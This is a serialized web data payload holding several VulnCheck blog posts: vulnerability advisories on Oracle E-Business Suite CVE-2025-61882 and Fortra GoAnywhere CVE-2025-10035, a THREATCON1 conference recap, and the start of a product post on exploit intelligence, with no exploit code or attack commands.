public exploit code but no known CVE identifier (some of these also came from external researcher observations, hence the overlap).",[25,32939,32940,32941,982,32946,32951],{},"Two vulnerabilities (",[47,32942,32945],{"href":32943,"rel":32944},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2022-4980",[51],"CVE-2022-4980",[47,32947,32950],{"href":32948,"rel":32949},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-13990",[51],"CVE-2024-13990",") had exploitation evidence from 2022 and 2024, respectively — but did not have CVEs.",[18,32953,32954,32955,32960,32961,59],{},"VulnCheck has dozens of coordinated vulnerability disclosure (CVD) projects in flight at any given time for vulnerabilities reported to us by community researchers. Recent community research disclosures reported through VulnCheck CNA have included multiple vulnerabilities in Netgate pfSense (via Alex Williams of Pellera Technologies) and a slew of Vasion Print (formerly PrinterLogic) CVEs as a result of ",[47,32956,32959],{"href":32957,"rel":32958},"https:\u002F\u002Fpierrekim.github.io\u002Fblog\u002F2025-04-08-vasion-printerlogic-83-vulnerabilities.html",[51],"a beast-mode research report"," by Pierre Barre. You can see all VulnCheck ",[47,32962,32965],{"href":32963,"rel":32964},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories",[51],"vulnerability advisories here",[18,32967,32968,32969,32972],{},"Have a vulnerability you’re looking to disclose? ",[47,32970,31521],{"href":2999,"rel":32971},[51]," and we’ll handle disclosure coordination on your behalf! You get the credit, we do the software supplier outreach. Huge thanks to the research community for their help and input on vendor coordination and timely CVE assignment!",[61,32974,202],{"id":201},[18,32976,32977,32978,982,32981,59],{},"The VulnCheck research team is always on the lookout for new attack vectors and notable attacker behavior. 
For more research like this, see ",[47,32979,31532],{"href":31530,"rel":32980},[51],[47,32982,31540],{"href":31538,"rel":32983},[51],[18,32985,1228,32986,1234,32989,1240,32992,1246,32995,1255,32998,1260],{},[47,32987,1233],{"href":10806,"rel":32988},[51],[47,32990,1239],{"href":1237,"rel":32991},[51],[47,32993,1245],{"href":1243,"rel":32994},[51],[47,32996,1251],{"href":1249,"rel":32997},[51],[47,32999,216],{"href":1258,"rel":33000},[51],{"title":219,"searchDepth":220,"depth":220,"links":33002},[33003,33006,33007,33008,33009],{"id":32504,"depth":220,"text":32505,"children":33004},[33005],{"id":32511,"depth":1266,"text":32512},{"id":32718,"depth":220,"text":32719},{"id":32814,"depth":220,"text":32815},{"id":32907,"depth":220,"text":32908},{"id":201,"depth":220,"text":202},"2025-10-09","Insights on recent emerging threats, initial access vulnerabilities, and published CVEs from VulnCheck’s research teams",{"slug":33013},"october-2025-research-highlights","\u002Fblog\u002Foctober-2025-research-highlights",{"title":30353,"description":33011},"blog\u002Foctober-2025-research-highlights",[242,1281,1279,1280],"eR8sSoo0Hdy_HW54K_8q6mZi132SAzfliA75IEOvpmI",{"id":33020,"title":33021,"articles":33022,"authors":33023,"body":33026,"date":33165,"description":33166,"extension":234,"image":7,"link":7,"meta":33167,"navigation":237,"path":33169,"seo":33170,"series":7,"stem":33171,"subtype":7,"tags":33172,"__hash__":33174},"blog\u002Fblog\u002F2025-threatcon1-recap.md","THREATCON1 2025 Recap: A New Standard for Cybersecurity Events",[],[33024],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},"https:\u002F\u002Ftwitter.com\u002Ftmbainjr1",{"type":15,"value":33027,"toc":33157},[33028,33035,33038,33041,33044,33047,33051,33054,33060,33063,33067,33070,33073,33076,33079,33083,33086,33089,33092,33098,33102,33131,33134,33138,33141,33144,33148,33151,33154],[18,33029,33030,33031,59],{},"There’s something really special about running your own event. 
Not only do you have the opportunity to bring people together with a shared goal, but it gives you the opportunity to shape an event that becomes part of your brand, and a movement, not necessarily just an event. I’m talking about ",[47,33032,33034],{"href":32146,"rel":33033},[51],"THREATCON1 2025",[18,33036,33037],{},"I’m not big on quoting people to make a point, but in the words of Ralph Waldo Emerson, “Do not go where the path may lead, go instead where there is no path and leave a trail.” This is particularly applicable as VulnCheck’s growth strategy is rooted in the concept of “playing bigger.”",[18,33039,33040],{},"What is remarkable to me as the Marketing lead at VulnCheck is we don’t have hundreds of people at the company, and we’re a Marketing team of four people. We pulled off what I like to think of as something nearly impossible to execute as a small team.",[18,33042,33043],{},"However, there’s something about a huge challenge - one that suggests “this is too much to take on” - that we didn’t balk at. We approached it intelligently without striving for perfection, and the entire VulnCheck organization pitched in to support THREATCON1.",[18,33045,33046],{},"VulnCheck’s THREATCON1 was a massive success for many reasons. This is an attempt to highlight the key elements that helped us build an event that is now our flagship experience, one that will only grow after its first year.",[61,33048,33050],{"id":33049},"threatcon1-keynote","THREATCON1 Keynote",[18,33052,33053],{},"I personally had the privilege of moderating an important discussion between Jen Easterly, former Director of CISA, and Andrew Boyd, former Head of the Center for Cyber Intelligence at the CIA. 
We selected both speakers based on their deep cyber backgrounds in defensive and offensive cyber respectively.",[18,33055,33056],{},[68,33057],{"alt":33058,"src":33059,"width":28205},"Keynote Presentation From THREATCON1","\u002Fblog\u002F2025-threatcon1-recap\u002FIMG_3033.jpg",[18,33061,33062],{},"All I can say is this was one of the more enlightening and eye-opening sessions I’ve ever witnessed, not to mention participate in. And what made it special was getting to know Jen and Andy - knowing they are just both super cool humans with knowledge and experience that is as impressive as it is inspiring.",[61,33064,33066],{"id":33065},"who-attended-and-participated","Who Attended and Participated",[18,33068,33069],{},"We had nearly 400 registrants and hundreds of attendees at THREATCON1, which is an amazing response for a first-year event. Titles ranged from CISOs to threat intelligence analysts to vulnerability management practitioners to security researchers and go-to-market teams. The cross-section of leaders and newcomers across different domains in cyber meant that there was relevant content and purpose for attending.",[18,33071,33072],{},"THREATCON1 also featured 17 VulnCheck customers who attended the conference across its diverse installed base: Enterprise, Federal, Cybersecurity companies and cyber insurers. It sure makes life easier when customers are supporting an initiative like this. I would have been happy with five coming, but 17 was next-level!",[18,33074,33075],{},"Overall we had 34 presenters at the conference also, running two separate tracks: our Tech Track and our Showcase Track. We covered topics all relating to identifying, understanding and countering emerging threats. If you missed THREATCON1, we will have our resource center live very soon to view all our amazing content.",[18,33077,33078],{},"We also had seven sponsors of THREATCON1: Carahsoft, RunSafe Security, NetRise, HeroDevs, FleetDM, Blackwire Labs and Cogent Security. 
All participated at the highest level in terms of presentations and networking. THREATCON1 doesn’t happen without sponsor support. Taking a flyer on sponsoring a first-year event isn’t the easiest decision in any business, and VulnCheck is appreciative of their support across the board.",[61,33080,33082],{"id":33081},"our-partners","Our Partners",[18,33084,33085],{},"I’ll first say that as we hosted this event at the Carahsoft global headquarters, THREATCON1 doesn’t happen without Carahsoft. First, they’re an incredible business partner to VulnCheck with deep expertise in navigating the Federal market and who have helped us push VulnCheck intelligence into Federal sites and systems. It's not lost on me that it can be challenging for well-established teams to entertain the notion of an early-stage startup bringing the next big thing in cyber to teams who rely on them as trusted technology advisors.",[18,33087,33088],{},"However, it's not limited to just that - the Carahsoft Marketing team, their facilities team and their A\u002FV specialists helped us create an experience with THREATCON1 that hopefully will remain top-of-mind for years to come as we grow it and start planning for our 2026 conference.",[18,33090,33091],{},"Also, Marketbridge, VulnCheck’s PR firm of record, was immensely helpful in putting this event on the map, working with reporters ahead of the event and onsite too, to ensure the media had the level of access to the content and presenters necessary.",[18,33093,33094],{},[68,33095],{"alt":33096,"src":33097,"width":28205},"Panel Talk From THREATCON1","\u002Fblog\u002F2025-threatcon1-recap\u002FIMG_3036.jpg",[61,33099,33101],{"id":33100},"our-podcast","Our Podcast",[18,33103,33104,33105,1246,33110,1246,33115,1246,33120,982,33125,33130],{},"My good friend Patrick Garrity and I kicked off our THREATCON1 podcast the week prior to the event to help show the world what they could expect from our conference. 
THREATCON1 is available on ",[47,33106,33109],{"href":33107,"rel":33108},"https:\u002F\u002Fpodcasts.apple.com\u002Fus\u002Fpodcast\u002Fthreatcon1\u002Fid1840497653",[51],"Apple",[47,33111,33114],{"href":33112,"rel":33113},"https:\u002F\u002Fopen.spotify.com\u002Fshow\u002F7exxOX3rmj0Ic1zhtsIkBu",[51],"Spotify",[47,33116,33119],{"href":33117,"rel":33118},"https:\u002F\u002Fmusic.amazon.com\u002Fpodcasts\u002F76b9bdf2-0cad-4ee5-b0c9-b96984a0e15f",[51],"Amazon",[47,33121,33124],{"href":33122,"rel":33123},"https:\u002F\u002Fwww.iheart.com\u002Fpodcast\u002F269-threatcon1-295026477\u002F",[51],"iHeartRadio",[47,33126,33129],{"href":33127,"rel":33128},"https:\u002F\u002Fwww.youtube.com\u002Fplaylist?list=PLxJm4O47cW3WFm5zGvyuDABivD91rveIR",[51],"YouTube",". We kicked off with episodes one and two featuring Jen Easterly and Andy Boyd respectively.",[18,33132,33133],{},"But this isn’t just limited to conference-related content - this will be a large part of VulnCheck bringing on interesting, important and unique voices from the cyber industry, all focused on the emerging cyber threat landscape. Look for our next set of episodes that’ll drop in the coming weeks.",[61,33135,33137],{"id":33136},"other-cool-stuff-we-did","Other Cool Stuff We Did",[18,33139,33140],{},"As part of the experience, we put together our first THREATCON1 golf tournament at Reston National Golf Club the day prior to our conference. Needless to say it was a blast. From first-timers to experienced golfers, we filled the course with people to activate networking and partnering opportunities. My foursome finished third in prize money netting a whopping $40.08. We’re all $10.02 richer today as a result!",[18,33142,33143],{},"And we ran a Capture the Flag challenge that yielded far more participants than we could have expected, hosted by our Initial Access research and product team. It was a mix of trivia, PCAP analysis, reverse engineering, and exploitation tasks, and participants were rewarded for their efforts. 
In fact it was so successful that we’re planning some new exercises to roll out more broadly - stay tuned for more cool stuff from us!",[61,33145,33147],{"id":33146},"thats-a-wrap","That’s a Wrap",[18,33149,33150],{},"We hope to continuously engage our audience by making all the aspects of THREATCON1 unique, interesting and fun. If you missed it, we sincerely hope you’ll get involved for our 2026 event.",[18,33152,33153],{},"What I learned along the way with THREATCON1 is if you can dream it and apply stringent execution to make it happen, anything is possible. Even just taking the time out of your average day in the industry to connect with friends, colleagues and leaders was so worth the time. Like even just making new friends in the industry and welcoming new VulnCheckers to the THREATCON1 experience was one of the most rewarding things I’ve done in my career.",[18,33155,33156],{},"We’ll have a Call for Papers going live in January, and again thank you to EVERYONE for making THREATCON1 a success!",{"title":219,"searchDepth":220,"depth":220,"links":33158},[33159,33160,33161,33162,33163,33164],{"id":33049,"depth":220,"text":33050},{"id":33065,"depth":220,"text":33066},{"id":33081,"depth":220,"text":33082},{"id":33100,"depth":220,"text":33101},{"id":33136,"depth":220,"text":33137},{"id":33146,"depth":220,"text":33147},"2025-10-06","VulnCheck's inaugural THREATCON1 event brought together hundreds of cybersecurity professionals for a groundbreaking conference focused on emerging threats and innovative 
solutions.",{"slug":33168},"2025-threatcon1-recap","\u002Fblog\u002F2025-threatcon1-recap",{"title":33021,"description":33166},"blog\u002F2025-threatcon1-recap",[33173],"community","99WMnRbqJZ2AwdVCwtMFpVOn0tjtf3B_QmOH-9VE4HA",{"id":33176,"title":33177,"articles":7,"authors":33178,"body":33180,"date":33165,"description":33319,"extension":234,"image":7,"link":7,"meta":33320,"navigation":237,"path":33321,"seo":33322,"series":7,"stem":33323,"subtype":7,"tags":33324,"__hash__":33325},"blog\u002Fblog\u002Foracle-e-business-suite-cve-2025-61882-exploited-in-extortion-attacks.md","Oracle E-Business Suite CVE-2025-61882 Exploited in Extortion Attacks",[33179],{"name":256,"link":258,"avatar":257,"linkName":219},{"type":15,"value":33181,"toc":33312},[33182,33185,33199,33201,33210,33219,33228,33237,33241,33244,33247,33257,33261,33269,33272,33274,33291,33294,33297,33299],[18,33183,33184],{},"Cl0p, a prolific ransomware and extortion threat group, confirmed that they were behind a large-scale extortion campaign targeting Oracle E-Business Suite (EBS) customers that appears to have begun September 29.",[22,33186,33187,33190,33193,33196],{},[25,33188,33189],{},"Oracle initially made a statement indicating that one or more vulnerabilities patched in July 2025 were potentially exploited; they later published CVE-2025-61882, a net-new zero-day vulnerability linked to the attack.",[25,33191,33192],{},"A rival threat group posted what they said was the exploit Cl0p had used to gain access to Oracle EBS data. VulnCheck and others have confirmed this exploit is legitimate.",[25,33194,33195],{},"Signatures, ASM queries, and a PCAP for CVE-2025-61882 are available to VulnCheck initial access intelligence customers. 
CVE-2025-61882 has been added to VulnCheck KEV.",[25,33197,33198],{},"On Saturday, October 11, Oracle disclosed CVE-2025-61884, a second vulnerability in E-Business Suite.",[61,33200,11273],{"id":11272},[18,33202,33203,33204,33209],{},"On September 29, 2025, multiple organizations began receiving extortion emails purporting to be from the Cl0p ransomware and extortion group. The emails, which were aimed at Oracle E-Business Suite (EBS) customers, claimed that Cl0p had \"recently breached your Oracle E-Business Suite application and copied a lot of documents.\" While threat intel practitioners were initially uncertain whether the extortion emails were coming from Cl0p vs. from an impersonator, Cl0p ",[47,33205,33208],{"href":33206,"rel":33207},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fclop-extortion-emails-claim-theft-of-oracle-e-business-suite-data\u002F",[51],"confirmed"," to Bleeping Computer on October 1 that they were involved in the campaign.",[18,33211,33212,33213,33218],{},"On October 2, Oracle released a brief statement noting that some Oracle EBS customers had received extortion emails, and that an ongoing investigation had \"found the potential use of previously identified vulnerabilities that are addressed in the July 2025 ",[47,33214,33217],{"href":33215,"rel":33216},"https:\u002F\u002Fwww.oracle.com\u002Fsecurity-alerts\u002Fcpujul2025.html",[51],"Critical Patch Update",".\"",[18,33220,33221,33222,33227],{},"A day later, however, on Friday, October 3, a rival threat group called ShinyHunters posted a profanity-laced tirade against Cl0p alongside what they claimed was the exploit Cl0p had used to gain access to Oracle EBS data. 
Late in the evening of Saturday, October 4, Oracle ",[47,33223,33226],{"href":33224,"rel":33225},"https:\u002F\u002Fblogs.oracle.com\u002Fsecurity\u002Fpost\u002Fapply-july-2025-cpu",[51],"released a revised statement"," pointing to a net-new zero-day vulnerability discovered during their investigation. The ShinyHunters exploit is directly referenced in the IOCs Oracle released in the zero-day advisory.",[18,33229,33230,33231,33236],{},"The zero-day vulnerability, ",[47,33232,33235],{"href":33233,"rel":33234},"https:\u002F\u002Fwww.oracle.com\u002Fsecurity-alerts\u002Falert-cve-2025-61882.html",[51],"CVE-2025-61882",", resides in the BI Publisher Integration component of Oracle Concurrent Processing, which is part of Oracle EBS. No vulnerability root cause was specified in the advisory, but Oracle's guidance does say the vulnerability is remotely exploitable without authentication and can result in remote code execution. CVE-2025-61882 carries a CVSS score of 9.8. Combined with IOCs pointing to the ShinyHunters exploit, the revised Oracle statement appears to confirm that CVE-2025-61882 was used in the Cl0p-attributed campaign.",[61,33238,33240],{"id":33239},"cve-2025-61882-exploit-observations","CVE-2025-61882 Exploit Observations",[18,33242,33243],{},"It's currently unknown whether other threat groups have already deployed the exploit for their own ends, but defenders should note that anyone who was following the ShinyHunters saga already has direct access to the full exploit. In other words, broader exploitation is likely if not inevitable.",[18,33245,33246],{},"As of October 6, FOFA showed a little more than 5,000 Oracle EBS login pages exposed to the public internet; Censys shows roughly half that.",[18,33248,33249,33250,33253,33254,59],{},"VulnCheck's research team has tested the exploit against a vulnerable version of Oracle EBS and was able to reproduce the attack and confirm the IOCs match those in Oracle's advisory on CVE-2025-61882. 
",[295,33251,33252],{},"Network signatures, ASM queries, and a PCAP for this vulnerability are available to VulnCheck Initial Access Intelligence customers."," CVE-2025-61882 has also been added to ",[47,33255,1233],{"href":10806,"rel":33256},[51],[61,33258,33260],{"id":33259},"cve-2025-61884-second-vulnerability-disclosed","CVE-2025-61884: Second Vulnerability Disclosed",[18,33262,33263,33264,33268],{},"On Saturday, October 11, Oracle published an ",[47,33265,5359],{"href":33266,"rel":33267},"https:\u002F\u002Fwww.oracle.com\u002Fsecurity-alerts\u002Falert-cve-2025-61884.html",[51]," for CVE-2025-61884, a high-severity vulnerability in the Runtime UI component of E-Business Suite's Oracle Configurator product. Per the advisory, the vulnerability is remotely exploitable without authentication. Successful exploitation \"may allow access to sensitive resources.\"",[18,33270,33271],{},"No CWE (root cause) is provided, the advisory doesn't explain which \"sensitive resources\" may be affected, and Oracle doesn't specify one way or another whether CVE-2025-61884 has been exploited or is related to CVE-2025-61882. The CVSS v4 vector for CVE-2025-61884 notes that the vulnerability only impacts confidentiality (not integrity or availability).",[61,33273,1782],{"id":1781},[18,33275,33276,33277,33280,33281,33286,33287,59],{},"CVE-2025-61882 affects supported versions 12.2.3 - 12.2.14 of Oracle E-Business Suite. Unsupported versions may also be vulnerable. 
Oracle EBS customers should ",[295,33278,33279],{},"immediately"," apply the vendor-supplied ",[47,33282,33285],{"href":33283,"rel":33284},"https:\u002F\u002Fsupport.oracle.com\u002Frs?type=doc&id=3106344.1",[51],"patch"," and hunt for the presence of any IOCs in the ",[47,33288,33290],{"href":33233,"rel":33289},[51],"Oracle advisory",[18,33292,33293],{},"Patch availability information for CVE-2025-61884 is behind customer login, but since it's unclear whether the flaw has been exploited, defenders may want to assume that vulnerability should also be patched on an emergency basis.",[18,33295,33296],{},"As always, patching alone does not eradicate prior compromise.",[61,33298,202],{"id":201},[18,33300,33301,33302,1246,33306,1255,33309,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and exploit. For more research like this, see ",[47,33303,33305],{"href":32682,"rel":33304},[51],"CVE-2025-10035: Critical Vulnerability in Fortra GoAnywhere MFT",[47,33307,32017],{"href":32015,"rel":33308},[51],[47,33310,31540],{"href":31538,"rel":33311},[51],{"title":219,"searchDepth":220,"depth":220,"links":33313},[33314,33315,33316,33317,33318],{"id":11272,"depth":220,"text":11273},{"id":33239,"depth":220,"text":33240},{"id":33259,"depth":220,"text":33260},{"id":1781,"depth":220,"text":1782},{"id":201,"depth":220,"text":202},"A new Oracle E-Business Suite zero-day vulnerability is being linked to a Cl0p extortion campaign that exfiltrated EBS data from Oracle customer 
environments",{},"\u002Fblog\u002Foracle-e-business-suite-cve-2025-61882-exploited-in-extortion-attacks",{"title":33177,"description":33319},"blog\u002Foracle-e-business-suite-cve-2025-61882-exploited-in-extortion-attacks",[242,1281],"n121kNFUbMUkE0EFmaMZnF-A3XHhyBOYAu5C9-yLFP4",{"id":33327,"title":33305,"articles":33328,"authors":33355,"body":33357,"date":33332,"description":33528,"extension":234,"image":7,"link":7,"meta":33529,"navigation":237,"path":33530,"seo":33531,"series":7,"stem":33532,"subtype":7,"tags":33533,"__hash__":33534},"blog\u002Fblog\u002Fcve-2025-10035-fortra-go-anywhere-mft.md",[33329,33333,33336,33340,33343,33347,33351],{"title":33330,"source":11228,"link":33331,"date":33332},"Researchers raise alarm over maximum-severity defect in GoAnywhere file-transfer service","https:\u002F\u002Fcyberscoop.com\u002Fgoanywhere-file-transfer-service-vulnerability-september-2025\u002F","2025-09-19",{"title":33334,"source":3486,"link":33335,"date":33332},"Fortra patches critical GoAnywhere MFT flaw akin to past ransomware exploits","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4060276\u002Ffortra-patches-critical-goanywhere-mft-flaw-akin-to-past-ransomware-exploits.html",{"title":33337,"source":3495,"link":33338,"date":33339},"Risky Bulletin: Cyberattack disrupts airports across Europe","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-cyberattack-disrupts-airports-across-europe\u002F","2025-09-22",{"title":33341,"source":25048,"link":33342,"date":33339},"Security analysts alarmed over latest GoAnywhere MFT vulnerability","https:\u002F\u002Fwww.cyberdaily.au\u002Fsecurity\u002F12664-security-analysts-alarmed-over-latest-goanywhere-mft-vulnerability",{"title":33344,"source":33345,"link":33346,"date":33339},"Unpatched Fortra GoAnywhere instances at risk of full takeover 
(CVE-2025-10035)","HelpNetSecurity","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2025\u002F09\u002F22\u002Ffortra-goanywhere-vulnerability-cve-2025-10035\u002F",{"title":33348,"source":11228,"link":33349,"date":33350},"Worries mount over max-severity GoAnywhere defect","https:\u002F\u002Fcyberscoop.com\u002Fgoanywhere-vulnerability-active-exploitation-september-2025\u002F","2025-09-26",{"title":33352,"source":11228,"link":33353,"date":33354},"Fortra cops to exploitation of GoAnywhere file-transfer service defect","https:\u002F\u002Fcyberscoop.com\u002Ffortra-goanywhere-vulnerability-exploitation\u002F","2025-10-13",[33356],{"name":256,"link":258,"avatar":257},{"type":15,"value":33358,"toc":33522},[33359,33370,33382,33385,33388,33418,33423,33427,33450,33454,33467,33469,33476,33479,33482,33485,33487,33505],[22,33360,33361,33364,33367],{},[25,33362,33363],{},"Cybersecurity company Fortra disclosed a new critical vulnerability in GoAnywhere MFT",[25,33365,33366],{},"It's unclear whether the vulnerability has been exploited in the wild, but past GoAnywhere MFT vulnerabilities have been targeted by ransomware and other threat actors (note: we later discovered the vulnerability was exploited as a zero-day)",[25,33368,33369],{},"Fixed versions are available and customers should restrict access to the admin console",[18,33371,33372,33373,33377,33378,33381],{},"Late on Thursday, September 18, cybersecurity firm Fortra ",[47,33374,22232],{"href":33375,"rel":33376},"https:\u002F\u002Fwww.fortra.com\u002Fsecurity\u002Fadvisories\u002Fproduct-security\u002Ffi-2025-012",[51]," an advisory for ",[47,33379,32635],{"href":32633,"rel":33380},[51],", a critical vulnerability in their GoAnywhere MFT solution. 
The vulnerability ultimately arises from a deserialization flaw in GoAnywhere MFT's license servlet, allowing remote attackers with “a validly forged license response signature to deserialize an arbitrary actor-controlled object, possibly leading to command injection.” The vulnerability carries a CVSSv3 score of 10.",[18,33383,33384],{},"Fortra's advisory doesn't specify whether the issue has been exploited in the wild.",[18,33386,33387],{},"GoAnywhere MFT is a managed file transfer product that stores a wealth of sensitive data and is a crown jewel-type target particularly for ransomware and extortion groups. The vendor advisory lists the discovery date for CVE-2025-10035 as September 13, meaning the turnaround time from discovery to patch release was nominally only five days — an appropriately urgent (but still impressive) fix timeline for a product that has previously been exploited by ransomware and other groups:",[22,33389,33390,33404],{},[25,33391,33392,33397,33398,33403],{},[47,33393,33396],{"href":33394,"rel":33395},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-0669",[51],"CVE-2023-0669",", another deserialization vulnerability that led to command injection, was disclosed as a zero-day in early 2023 after being exploited by the Cl0p ransomware and extortion group in a hack that ",[47,33399,33402],{"href":33400,"rel":33401},"https:\u002F\u002Ftechcrunch.com\u002F2023\u002F03\u002F22\u002Ffortra-goanywhere-ransomware-attack\u002F",[51],"affected"," 100+ organizations; to date, the flaw is known to have been leveraged by at least five different ransomware groups.",[25,33405,33406,33411,33412,33417],{},[47,33407,33410],{"href":33408,"rel":33409},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-0204",[51],"CVE-2024-0204",", a critical authentication bypass, was disclosed in early 2024 and 
",[47,33413,33416],{"href":33414,"rel":33415},"https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Ffortra-goanywhere-critical-cve\u002F705476\u002F",[51],"allowed"," adversaries to access the admin panel and add unauthorized admin users. CVE-2024-0204 isn't known to have been exploited en masse, but has had multiple weaponized public exploits available since January 2024; Shadowserver is still detecting ongoing exploitation attempts for this issue as of September 2025.",[18,33419,33420],{},[295,33421,33422],{},"Notably, the vulnerability description and root cause of CVE-2025-10035 are virtually identical to the description of CVE-2023-0669.",[61,33424,33426],{"id":33425},"exploitation-in-the-wild-updates-october-2025","Exploitation in the Wild Updates: October 2025",[18,33428,33429,33430,33434,33435,33440,33441,33445,33446,33449],{},"Since VulnCheck originally published this blog post, multiple sources have reported that CVE-2025-10035 was exploited in the wild as a zero-day. On September 25, 2025 security firm watchTowr ",[47,33431,12291],{"href":33432,"rel":33433},"https:\u002F\u002Flabs.watchtowr.com\u002Fit-is-bad-exploitation-of-fortra-goanywhere-mft-cve-2025-10035-part-2\u002F",[51]," that evidence of exploitation had been reported to them privately and aligned directly with the stack traces laid out in Fortra's advisory. On September 29, the vulnerability was also ",[47,33436,33439],{"href":33437,"rel":33438},"https:\u002F\u002Fwww.cisa.gov\u002Fnews-events\u002Falerts\u002F2025\u002F09\u002F29\u002Fcisa-adds-five-known-exploited-vulnerabilities-catalog",[51],"added"," to CISA KEV. 
A week later, on October 6, Microsoft published ",[47,33442,33444],{"href":32687,"rel":33443},[51],"a blog"," detailing in-the-wild exploitation attributed to ",[47,33447,941],{"href":32645,"rel":33448},[51],", which in at least one incident resulted in Medusa ransomware deployment; the activity Microsoft observed began on September 11, a week before Fortra's public advisory on CVE-2025-10035.",[61,33451,33453],{"id":33452},"unanswered-questions","Unanswered Questions",[18,33455,33456,33457,982,33461,33466],{},"VulnCheck and at least two other research firms (",[47,33458,14823],{"href":33459,"rel":33460},"https:\u002F\u002Flabs.watchtowr.com\u002Fis-this-bad-this-feels-bad-goanywhere-cve-2025-10035\u002F",[51],[47,33462,33465],{"href":33463,"rel":33464},"https:\u002F\u002Fattackerkb.com\u002Ftopics\u002FLbA9ANjcdz\u002Fcve-2025-10035\u002Frapid7-analysis?referrer=vulncheck",[51],"Rapid7",") have analyzed CVE-2025-10035 and independently determined that exploitation requires a private key that is not generally known. Since CVE-2025-10035 has now been identified as a zero-day vulnerability, it's clear, however, that one or more adversaries DOES have access to this private key — it's not currently known how this came about. As of October 7, 2025, Fortra's advisory for the issue still does not specify that it has been exploited in the wild.",[61,33468,1782],{"id":1781},[18,33470,33471,33472,33475],{},"Fortra's ",[47,33473,5359],{"href":33375,"rel":33474},[51]," for CVE-2025-10035 doesn't specify affected versions, but advises GoAnywhere MFT customers to update to a patched version, namely 7.8.4 (latest) or 7.6.3 (“Sustain Release”). 
The vendor also notes that “exploitation of this vulnerability is highly dependent upon systems being externally exposed to the internet.”",[18,33477,33478],{},"Given GoAnywhere MFT's history of threat actor targeting, we'd advise making that update an immediate priority, along with ensuring the GoAnywhere MFT admin console isn't exposed to the public internet. In general, it's also advisable to implement egress filtering and alert on large file uploads, high-volume traffic to suspicious IPs or domains, and data transfer and archive utility usage.",[18,33480,33481],{},"As always, since we now know the vulnerability was exploited in the wild as a zero-day, patching alone will not eradicate adversaries from compromised systems.",[18,33483,33484],{},"PCAPs, Snort and Suricata rules, and a vulnerable Docker container for this vulnerability are available to VulnCheck Initial Access Intelligence customers. CVE-2025-10035 is also on VulnCheck KEV.",[61,33486,202],{"id":201},[18,33488,33489,33490,1246,33495,1255,33500,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and abuse. 
For more research like this, see ",[1131,33491,33492],{},[47,33493,30358],{"href":30356,"rel":33494},[51],[1131,33496,33497],{},[47,33498,32017],{"href":32015,"rel":33499},[51],[1131,33501,33502],{},[47,33503,31540],{"href":31538,"rel":33504},[51],[18,33506,1228,33507,1234,33510,1240,33513,1246,33516,1255,33519,1260],{},[47,33508,1233],{"href":10806,"rel":33509},[51],[47,33511,1239],{"href":1237,"rel":33512},[51],[47,33514,1245],{"href":1243,"rel":33515},[51],[47,33517,1251],{"href":1249,"rel":33518},[51],[47,33520,216],{"href":1258,"rel":33521},[51],{"title":219,"searchDepth":220,"depth":220,"links":33523},[33524,33525,33526,33527],{"id":33425,"depth":220,"text":33426},{"id":33452,"depth":220,"text":33453},{"id":1781,"depth":220,"text":1782},{"id":201,"depth":220,"text":202},"A new critical vulnerability was disclosed in Fortra's GoAnywhere managed file transfer product, which has been targeted in the past by ransomware and extortion groups",{},"\u002Fblog\u002Fcve-2025-10035-fortra-go-anywhere-mft",{"title":33305,"description":33528},"blog\u002Fcve-2025-10035-fortra-go-anywhere-mft",[242,1281],"PI9rLeNbMSRYM0Lj7CeNUXSTIRuEiXVnIQaQFazyGUo",{"id":33536,"title":33537,"articles":7,"authors":33538,"body":33544,"date":33734,"description":33735,"extension":234,"image":7,"link":7,"meta":33736,"navigation":237,"path":33738,"seo":33739,"series":7,"stem":33740,"subtype":7,"tags":33741,"__hash__":33742},"blog\u002Fblog\u002Fvulncheck-initial-access.md","Getting Ahead of Exploitation with Initial Access Intelligence",[33539],{"name":33540,"avatar":33541,"link":33542,"linkName":33543},"Tim 
Roberts","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U08T1TQ07RQ-a20bab79afb1-72","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Ftimroberts213\u002F","in\u002Ftimroberts213\u002F",{"type":15,"value":33545,"toc":33723},[33546,33552,33555,33558,33563,33567,33570,33573,33576,33590,33593,33597,33602,33605,33608,33612,33617,33620,33624,33627,33631,33634,33648,33652,33666,33670,33673,33699,33703,33706,33709,33712,33714,33716,33718],[18,33547,33548],{},[68,33549],{":width":10862,"alt":33550,"src":33551},"Initial Access Exploits","\u002Fblog\u002Fvulncheck-initial-access\u002Finitial-access-overtime.png",[1920,33553,33537],{"id":33554},"getting-ahead-of-exploitation-with-initial-access-intelligence",[18,33556,33557],{},"In cybersecurity, timing is everything. Whether you're responding to threats, building detections, or preparing for red team exercises, knowing that a vulnerability is exploitable and having access to functional code can mean the difference between proactive defense and damage control.",[18,33559,33560,33562],{},[295,33561,21185],{}," delivers that edge. Built by a team of former government exploit developers and offensive security experts (including contributors to Metasploit), IAI delivers production-ready, validated exploits and detections for vulnerabilities most likely to be exploited for initial access and most likely to be added to CISA’s Known Exploited Vulnerabilities (KEV) catalog.",[61,33564,33566],{"id":33565},"why-public-poc-isnt-enough","Why Public PoC Isn’t Enough",[18,33568,33569],{},"Public proof-of-concept (PoC) code is often incomplete, unstable, straight-up fake, or requires significant modification before it's usable in real-world conditions. Even when a PoC is available, it can take days or weeks for a functional, weaponized version to emerge. 
